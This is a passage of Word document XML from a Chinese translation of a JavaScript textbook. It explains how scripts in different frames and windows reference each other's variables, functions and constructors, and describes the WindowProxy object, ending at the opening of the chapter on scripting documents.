        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>查询窗体的编号。但是这里我们使用</w:t>
      </w:r>
      <w:r>
        <w:t>frames</w:t>
      </w:r>
      <w:r>
        <w:t>来代替</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>会比较清晰一些，尽管这种方法有些传统。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>需要注意的是，当前的浏览器不会让</w:t>
      </w:r>
      <w:r>
        <w:t>frame==window</w:t>
      </w:r>
      <w:r>
        <w:t>，但在</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>不相等的情况下，可以通过子窗体的索引或名字来获取其他对象的引用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞的元素的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性作为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中的引用标识。但如果使用</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性的话，所指定的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>同样也会成为代表这个窗</w:t>
      </w:r>
      <w:r>
        <w:t>体的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性。以这种方式给出的名字可以用做一个链接的</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>属性，而且它可以用做</w:t>
      </w:r>
      <w:r>
        <w:t>window.open()</w:t>
      </w:r>
      <w:r>
        <w:t>的第二个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="350" w:name="14_8_3_Jiao_Hu_Chuang_Kou_Zhong_De_JavaS"/>
      <w:r>
        <w:t>14.8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　交互窗口中的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="350"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每个窗口和窗体都是它自身的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>执行上下文，以</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>作为全局对象。但是如果一个窗口或窗体中的代码可以应用到其他窗口或窗体（并且同源策略没有阻止它），那么一个窗口或窗体中的脚本就可以和其他窗口或窗体中的脚本进行交互。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设想一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面里有两个＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，分别叫</w:t>
      </w:r>
      <w:r>
        <w:t>"A"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"B"</w:t>
      </w:r>
      <w:r>
        <w:t>，并假设这些</w:t>
      </w:r>
      <w:r>
        <w:t>窗体所包含的文档来自于相同的一个服务器，并且包含交互脚本。窗体</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>里的脚本定义了一个变量</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i=3;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个变量只是全局对象的一个属性，也是</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一个属性。窗体</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>中的代码可以用标识符</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>来引用变量，或者用</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>对象显式地引用这个变量：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于窗体</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>中的脚本可以引用窗体</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象，因此它也可以引用那个</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parent.A.i=4;//</w:t>
      </w:r>
      <w:r>
        <w:t>改变窗体</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>中的变量</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们知道，定义函数的关键字</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>可以声明一个变量，就像关键字</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>所做的那样。如果窗体</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>中的脚本声明了一个（非嵌套的）函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，这个函数在窗体</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>中是全局变量，并且窗体</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>中的代码可以用</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>。但是窗体</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>中的代码必须将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为窗体</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>属性来引用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parent.B.f();//</w:t>
      </w:r>
      <w:r>
        <w:t>调用窗体</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>中定义的一个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果窗体</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>中的代码需要很频繁地使用这个函数，则可以将这个函数赋值给窗体</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>中的一个变量，这样就可以经常使用这个变量来引用窗体中的函数了：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var f=parent.B.f;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>现在窗体</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>中的代码就可以像窗体</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>中的代码那样调用函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当采用这种方式在窗体或窗口间共享函数时，牢记词法作用域的规则非常重要。函数在定义它的作用域中执行，而不是在调用它的作用域中执行。就上面那个例子来说，如果函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>引用了全局变量，那么将在窗体</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>的属性中查找这些变量，即使函数是由窗体</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>调用的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要记住构造函数也是函数，所以当用构造函数和相关的原型对象定义一个类（见第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章）时，那个类只在一个单独的窗口中定义。假设在例子</w:t>
      </w:r>
      <w:r>
        <w:t>9-6</w:t>
      </w:r>
      <w:r>
        <w:t>中的窗口包含窗体</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>和窗体</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>，并且包含</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>顶级窗口中的脚本可以创建新的</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>对象，类似这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s=new Set();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>相反，</w:t>
      </w:r>
      <w:r>
        <w:t>每个窗体中的代码必须显式地用父级窗口的属性来引用</w:t>
      </w:r>
      <w:r>
        <w:t>Set()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s=new parent.Set();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另外，每个窗体中的代码还可以定义自己的变量来引用构造函数，这样就更方便了：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var Set=top.Set();var s=new Set();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和用户定义的类不同，内置的类（比如</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>）都会在所有的窗口中自动预定义。但是要注意，每个窗口都有构造函数的一个独立副本和构造函数对应原型对象的一个独立副本。例如，每个窗口都有自己的</w:t>
      </w:r>
      <w:r>
        <w:t>String()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数和</w:t>
      </w:r>
      <w:r>
        <w:t>St</w:t>
      </w:r>
      <w:r>
        <w:t>ring.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>对象的副本。因此，如果编写一个操作</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>字符串的新方法，并且通过把它赋值给当前窗口中的</w:t>
      </w:r>
      <w:r>
        <w:t>String.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>对象而使它成为</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>类的一个方法，那么该窗口中的所有字符串就都可以使用这个新方法。但是，别的窗口中定义的字符串不能使用这个新方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>事实上，每个</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>都有自己的原型对象，这意味着</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>操作符不能跨窗口工作。例如，当用</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>来比较窗体</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>的一个字符串和窗体</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>String()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数时，结果会为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>7.10</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍了决定跨窗口数组的类型时的相关困难。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>WindowProxy</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们已经讲过很多次，</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象是客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的全局变量。但是从技术上来看，并不是这样的。</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器每次向窗口或窗体中载入新的内容，它都会开始一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>执行上下文，包含一个新创建的全局对象。但是当多个窗口或窗体在使用时，有一个重要的概念，尽管窗体或窗口载入了新的文档，但是引用窗体或窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象还仍然是一个有效的引用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所以客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>有两个重要的对象。客户端全局对象处于作用域</w:t>
      </w:r>
      <w:r>
        <w:t>链的顶级，并且是全局变量和函数所定义的地方。事实上，全局对象会在窗口或窗体载入新内容时被替换。我们称为</w:t>
      </w:r>
      <w:r>
        <w:t>“Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的对象实际上不是全局对象，而是全局对象的一个代理。每当查询或设置</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性时，就会在窗口或窗体的当前全局对象上查询或设置相同的属性。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>规范称这个代理对象为</w:t>
      </w:r>
      <w:r>
        <w:t>WindowProxy</w:t>
      </w:r>
      <w:r>
        <w:t>，但在本书中我们会继续使用名词</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>由于它的代理行为，除了有更长的生命周期之外，代理对象表现得像真正的全局对象。如果可以比较两个对象，那么区分它们会很困难。但是事实上，没有办法可以</w:t>
      </w:r>
      <w:r>
        <w:t>引用到真正的客户端全局对象。全局对象处于作用域链的顶端，但是</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>parent</w:t>
      </w:r>
      <w:r>
        <w:t>以及窗体的属性全部返回代理对象。</w:t>
      </w:r>
      <w:r>
        <w:t>window.open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法也返回代理对象。甚至顶级函数里</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字的值都是代理对象，而不是真正的全局对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的作者</w:t>
      </w:r>
      <w:r>
        <w:t>John Resig</w:t>
      </w:r>
      <w:r>
        <w:t>曾经写过一篇文章来解释这个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>队列</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，详情请参照：</w:t>
      </w:r>
      <w:r>
        <w:t>http://ejohn.org/blog/how-javascript-timers-work/</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>Netscape Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>（网景浏览器）是一个著名的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器，更多信息可阅读：</w:t>
      </w:r>
      <w:r>
        <w:t>http://en.wikipedia.org/wiki/Netscape_Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>模态对话框就是指那种</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>显示出来就不可以点选位于其下面的对话框</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的对话框。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>最后一点对于</w:t>
      </w:r>
      <w:r>
        <w:t>ES3</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>规范稍有违背，但客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是需要支持这种多重执行上下文的。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="351" w:name="Di_15Zhang__Jiao_Ben_Hua_Wen_Dang_____Ke"/>
      <w:bookmarkStart w:id="352" w:name="Di_15Zhang__Jiao_Ben_Hua_Wen_Dang_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>章　脚本化文档</w:t>
      </w:r>
      <w:bookmarkEnd w:id="351"/>
      <w:bookmarkEnd w:id="352"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>客户端</w:t>
